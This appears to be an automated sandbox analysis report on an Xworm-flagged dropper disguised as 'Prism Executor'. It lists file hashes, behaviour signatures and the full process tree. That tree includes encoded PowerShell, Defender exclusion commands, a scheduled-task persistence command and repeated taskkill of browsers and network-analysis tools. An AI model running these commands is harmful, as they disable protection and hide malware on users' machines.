| SHA512 | 2e73b1cf7cc2663c473b4afccd4072c0c2bd77f7f9b0f55dcef3bfab67c4395bf8773a7782c3b35fd21108b3bb303bcbeabe7169291816dcc3fcfcccd938c013 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b80b917d59e86c0c17a7b9bae72aab14 |
| SHA1 | 87be1901a1737f1715f3761b8e507c8be9f95f82 |
| SHA256 | 0db9f1b29b66bf4c9be649a080eb30fad3663e17645b930e4ab0c20db88573ae |
| SHA512 | f2df934f58a2148ed43b7c0829b2b04814370c33ed411936621e26d8fb98ae5951bcd864073faae69e45087b6b31280aeba9143453cc199d9dba421265ba453e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0cd6ed694480d99610792a4c284966e4 |
| SHA1 | f3e914345f555847b1a315d08cf58e4cec4fcbdd |
| SHA256 | ea8c826a5b8660cc4a53d891999d1632fa886ad07f8af73a853cc1d510ef9024 |
| SHA512 | 89cb9536afd3b44ca9395cf60cc54b88c741a6c404813c8b635961cd76b8c7c06b8a693d2958fdd0a8862587620c83d4c3971d3fb32cd903578cb0f0b15668a2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6ae26dcfcb677539f0661d0a6729346c |
| SHA1 | 40fc7395ab1edfd435962feee4bb16b15812a94a |
| SHA256 | 804f1a93d1a7c7eb4933f43e5adc5bae0a4ff2f096671b25ca4afd862d2beb41 |
| SHA512 | 37fe2f78dd4777b50de22d98c5cedca011837a8632e35278fdc7dcf2198b6718d24e7ee5585e03261b958e7eaf836942f278520438a52eda8464033c0d2f4109 |
C:\Users\Admin\AppData\Local\Temp\Tar8683.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | ca247a3814ebd97899c1f9a0e391e184 |
| SHA1 | 4d14eda1fde0f84845acfd5fea1362d420f33dcc |
| SHA256 | c4b23ecd07d314919aa9409723da6924e90b50ca2e4834c43629901f3ed014a4 |
| SHA512 | 7a7bf16b5b018f2f877cba6b90c0d42dc15ed5d23ee122cd8e0b7574358a9c9e557f5599e6c1b575692af39294606528f9b682e0b9e32b4eebcc043901ae59b1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0d2bdafbc8202b8206af1c98a0bf5eba |
| SHA1 | 0ac35d8744ddd5169cc9f1bec4c2ee53913646c4 |
| SHA256 | c7ba2bf0cc674e43431db36fb769b59cc71cc45d3e088893d4e8ab70feaab207 |
| SHA512 | ab0cbe42fca4e253ce7d2f0fc0ceb90862e4d62a128f1229bbd3ed16e85570fa8ca4d42920d215cf8115e5ffde3f0507454c416bae986f39727eb1b9419084b3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e99f51c2024970b38815b477e2349874 |
| SHA1 | 39d180ad7d81428db2fd5d356de9d6bd9d6fbda3 |
| SHA256 | 5cc091c03f45d8ec6c6e1f84f740e6afd2033fab89809f1af0a966392e05f517 |
| SHA512 | cff5ffa77b6055525d0a4bde8267d8979144459ddbf3e0bece52f31941aa35e8c04995be28c358594df79f12169999c772565b4be2d0a0cfb1abff23e7546e1e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b3283da3533f79b4111a8b5f3d3f327e |
| SHA1 | 25c8852e8ffdafcb432cf573dd63f31123f452b4 |
| SHA256 | 2908150bdc8ec1e2ca05b68eb311328a59bb55dc9cb09f8041e9ad64aeaa6bf4 |
| SHA512 | cc95f3668cd3bd53b6fe780f15ffbb89c5d861bf4b876c6717e8ed429d70847a39dba47b78dc91bf63dea8adf5f793eae12ab926020c1382f18655c46f38de99 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c126e454c64a4700a4f0fbbdb403d69b |
| SHA1 | 147b26507f27e9d228c1e2a998ea7d288dc8fb92 |
| SHA256 | d8c160063b3671e0e42ac183147e1331bba945f806f93de3c6e41d94e00cddf4 |
| SHA512 | 6cc9ced00427c51cf36c4956d83daa179603a3adf2b629dc08b5048754acbe1835bfeb7c2d5612bb1968838212035b8539db49018e49f63582911aa9377e9721 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f38414fa74208986dbcfcaa65dc0d0f2 |
| SHA1 | d64e07900ba0bcb1bcb17adaa2a12da153ce5c7e |
| SHA256 | 32f7609e194aa28d73a6b9580def101c7e6acc9fb5bab0d088cb9ab6b41530db |
| SHA512 | bf147021ef9598e9464cb4cead99abfcb8147a3b40ca104dc3e3cd2d0e89baaecaa74be29a3dc54d270b879476fa35685d813b3a21c8b169d64a9bd42ddb6fc6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 322c361893c72d50413c10d2c78658f9 |
| SHA1 | 183e2d1a942a2cf584b521839bfb84296cb593e3 |
| SHA256 | f3bb33c44e1afc78321d9e3cefc08cb4f12525419a51ba58fe867edd54bd8858 |
| SHA512 | 389788e7af9c9b0363753cbadfea897fee010f0a70c7afbd13b26b810cf1f5bef750a8daec25ed3527cb35d85bf29c6fe3eda8440731fe8a67a3685c6d7c6c2e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 23149a44ddc124b23c06c4def7dbb3b6 |
| SHA1 | 595d0c14192d046399d99023b029bd507392e5cd |
| SHA256 | a1c86de24174e05281276370d60a527927cad4aa86e88ed9f6b795b2c3b5298e |
| SHA512 | c33b0ee28b0093c590511ac7725a5c372d738fec504a769705a5a0a5140ff31409dc22bdaff4f2970dd3b5f767d6dcf21245f4968376426e4f9ec9ddaad31c10 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 1cc5552e67a672a199351736f84a5f61 |
| SHA1 | 8b859cea6a7cfc7d08172c08a8236c7f6bc4606c |
| SHA256 | a7042aa5a56126326fc500d640aae34c992b2cc9fd57a27ab8528f580f15f5b5 |
| SHA512 | 325cfd221acb925b8ae3ae012571e376a0a2d45e86367f1003f07662b4d844f4b4df81961b6ceb4424bd8b341fcbae272d36fd8c5e216cdf7bb54d1f8e7b199a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\f2fc92a7-a425-4ffb-b704-82608cbd47c8.tmp
| MD5 | eeaa5592383c0c54cffd4f81d481d0d1 |
| SHA1 | e778e4c7069d3da82b9580fdb3a9f7ed1e19f42f |
| SHA256 | 6496eac3d12595220c37b93114ec22f681452a61cf498395a95e569a08ea23c6 |
| SHA512 | 6adafe4a3346fcbe16e15639ecaedb73c51e135021e071a5b6aba1d15d88252c899b8fbb5d6468387a6123382dde9e8aea07f4b651efac1c1fb9abc4f968190f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 04205b8a83d9821f70ee12cb35ec3206 |
| SHA1 | fd1cc37566b5c97a1b7ee804b9202a8aab88178d |
| SHA256 | f5d1ee86392768377733c8e41afadac09ef096b7218b59c5526b14622d5f5a25 |
| SHA512 | 9d92ac7f7488a696c72529ca13b84e389b80c2a01fd179a1ade52397fcf019679fb517bef3438b3bd7d4017fe822bd1daa29d81a95082b813abeb0c8863ede7a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 1845d7bc46d00b7f1daaa749852f5690 |
| SHA1 | 28b026a3e03b0c44ef95b8b30e257c861b419ca8 |
| SHA256 | 1a4c20934cb675938a257656022301504d632e19688d3808db0ae25a874be698 |
| SHA512 | ff9a51d3051e2f10b631d026b0010bfbfde71d774ad5229b55c0c4287c3e857c685ac1eb4d5033d9fbd5e0426f2c02a0a9291ae7933a208ea0df94ff967724d2 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\dllhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Prism Executor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\nexusloader.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\zdibrj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Kills process with taskkill
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
C:\Users\Admin\dllhost.exe
"C:\Users\Admin\dllhost.exe"
C:\Users\Admin\Prism Executor.exe
"C:\Users\Admin\Prism Executor.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\nexusloader.exe
"C:\Users\Admin\Prism Executor.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Users\Admin\AppData\Local\Temp\zdibrj.exe
"C:\Users\Admin\AppData\Local\Temp\zdibrj.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\zdibrj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\onefile_2332_133628985707747446\svchost.exe" "--multiprocessing-fork" "parent_pid=1192" "pipe_handle=812"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
